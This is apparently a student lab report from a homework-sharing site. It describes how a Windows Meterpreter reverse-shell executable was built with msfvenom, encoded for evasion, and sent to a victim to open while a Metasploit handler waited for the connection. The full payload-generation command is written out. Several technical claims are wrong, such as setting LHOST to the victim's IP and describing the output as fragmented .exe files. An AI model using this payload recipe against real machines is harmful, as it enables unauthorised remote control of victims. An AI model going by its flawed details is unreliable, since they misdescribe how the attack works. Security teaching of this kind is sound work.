CSI3208 - Ethical Hacking: Kali Linux Metasploit Exploit Report

Verified

Added on 2023/06/04

AI Summary

This report provides a technical outline of a Kali Linux Metasploit exploit used for ethical hacking. It details the setup and execution of the exploit, which targets Windows platforms. The exploit allows the attacker to gain unauthorized access to the victim's machine, enabling operations like file modification and deletion. The process involves setting up a NAT network with Kali Linux and Windows machines, creating an executable file with the victim's IP address and PORT number, and using the Metasploit framework to activate a 'meterpreter' upon file execution on the target machine. The report concludes by emphasizing the vulnerability of data security and suggesting countermeasures like firewalls and antivirus software. Desklib offers similar solved assignments and past papers for students.

Running Head: ICT ETHICAL HACKING (EXPLOITS) 1
KALI LINUX EXPLOIT USING METASPLOIT
Student name
Institution Affiliation
Facilitator
Course
Date

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

ICT ETHICAL HACKING (EXPLOITS) 2
Introduction
Through Ethical hacking, the data security structure of an organization can be objectively
analyzed. Through ethical hacking, the weak points in an organization’s information systems are realized
and fixed earlier on before they can be taken utilized by unscrupulous attackers to cause huge loses. This
paper has scrutinized one of the common exploitations, Metasploit exploitation.
In our workshop, we engineered a Kali Linux Metasploit exploit which would be used mainly in
attacking machines operating on windows platforms (windows XP, 7, 8, 8.1 and 10). The exploit would
achieve its exploitive target by enabling the attacker to gain access to the victim’s machine just like a
person with login details and be able to carry out different operations like modification of files, deletion
of files and editing files. In its basic definition, a metasploit is a project that would enable the attacker
penetrates into any other machine under the same network provided he or she can trace the IP address of
the machine and one of its PORT numbers. The tool enables the attacker to come up with exploit code
and execute it in a targeted machine operating in a remote area (Holik, Horalek, Marik, Neradova & Zitta,
2014, p.240)
To set up our exploit, the basic requirements were: two machines which were strategically
positioned in a NAT network and were configured to operate under different operating systems (windows
and Kali Linux) and a metasploit framework which had the entire Ruby packages already installed. Since
an antivirus in the target machine would not allow us to proceed with the exploitation, we made sure that
there was no any active antivirus software installed in the target machine (windows machine). We utilized
a Metasploit command by the name Msfconsole throughout our penetration test because of it fully
supports the framework under Linux platform and its flexibility within the framework (Muniz, 2013).
To start our penetration test, we first of all had to obtain the IP address and a free PORT number
from the target machine. To get this information and in consideration to the fact that the two machine
were operating under one NAT network; we used software by the name Netcut to enquire the IP address.

ICT ETHICAL HACKING (EXPLOITS) 3
Having gotten the two identity information of the target machine, we thereafter created an executable file
under the Kali Linux platform and whose identity details were the IP address and PORT number we had
obtained from the target machine previously (Dieterle, 2016). To create the executable file, we used the
command “msfvenom –p windows/meterpreter/reverse_tcp LHOST= (IP address of windows machine)
LPORT= (PORT in the windows machine) –f exe –e x86/shikata_ga_nai –i 10> /root/desktop/ (desktop
name).exe”
This command enabled us to come up with an executable file under Linux platform which
comprised of several .exe executable files. We then send the folder containing these fragmented files to
the target machine over the network. We could also send the folder to the target machine through other
channels like mail but we chose the network because the two machines were under the same network
(Pritchett & De Smet, 2013). The reason behind sending these files was to trick the user of the victim to
open it.
As we waited the target machine user to open the already send file, we were entitled to set the
metasploit framework operating on our Kali Linux platform in an active mode in order to time the victim
to open the file and gain access into the machine. To set our machine into a listening status, we used the
command “exploit” under handler status of Msfconsole command. When the target machine user
eventually opened the file, on our Kali Linux platform “meterpreter” activated itself automatically.
The automatic activation of the “meterpreter” enabled us gain entrance into the machine of the
victim where we could perform operations with full rights just like it could be the case if we had logged
into the machine physically. Some of the activities we could do on the victim’s machine included reading
file contents on the screen, altering directories, modifying files, erasing files, navigating over files,
uploading files, altering the local directories, printing the local directories, eradicating directories, shifting
source to destination, and printing working directories. This was an indication that we had gotten into the
victim’s machine fully without his consent (Weidman, 2014).

ICT ETHICAL HACKING (EXPLOITS) 4
Conclusion
By allowing us to penetrate into the victim’s remote machine and gaining control just like the
owner is a confirmation that data security in the organization is vulnerable and hence should be regulated
by the necessary control measures. Such measure include but not limited to, configuration of firewalls and
installation of antivirus softwares such as AVG and Kaspersky.
References
Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent Publishing
Platform.
Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective penetration
testing with Metasploit framework and methodologies. In Computational Intelligence and
Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp. 237-242). IEEE.
Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.
Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd
Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.